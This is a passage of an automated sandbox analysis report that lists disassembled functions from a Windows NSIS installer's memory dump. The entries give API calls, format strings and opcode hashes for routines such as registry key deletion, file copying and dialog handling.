                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                                                                  • String ID: *?|<>/":
                                                                                                                                                                                  • API String ID: 589700163-165019052
                                                                                                                                                                                  • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                  • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                  • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                  • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                  Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeGloballstrcpyn
                                                                                                                                                                                  • String ID: Exch: stack < %d elements$Pop: stack empty$SeminarsRuralConductWagnerYahooWords
                                                                                                                                                                                  • API String ID: 1459762280-3176207372
                                                                                                                                                                                  • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                  • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                  • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                  Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                                                                  • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                  • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                  • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                  Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                  • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                  • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3376005127-0
                                                                                                                                                                                  • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                  • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                  • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                  Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2568930968-0
                                                                                                                                                                                  • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                  • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                  Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                                                  • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                  • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                  • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                  Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                                                  • String ID: !
                                                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                                                  • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                  • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                  • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                  • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                  Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                                                                  • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                  • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                  • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                  • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                  Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                  • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                  • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                  • API String ID: 1697273262-1764544995
                                                                                                                                                                                  • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                  • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                  Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                    • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                    • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                  • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                  • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                  • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                  • API String ID: 2577523808-3778932970
                                                                                                                                                                                  • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                  • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                  Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: lstrcatwsprintf
                                                                                                                                                                                  • String ID: %02x%c$...
                                                                                                                                                                                  • API String ID: 3065427908-1057055748
                                                                                                                                                                                  • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                  • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                  • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                  • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                  Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                    • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
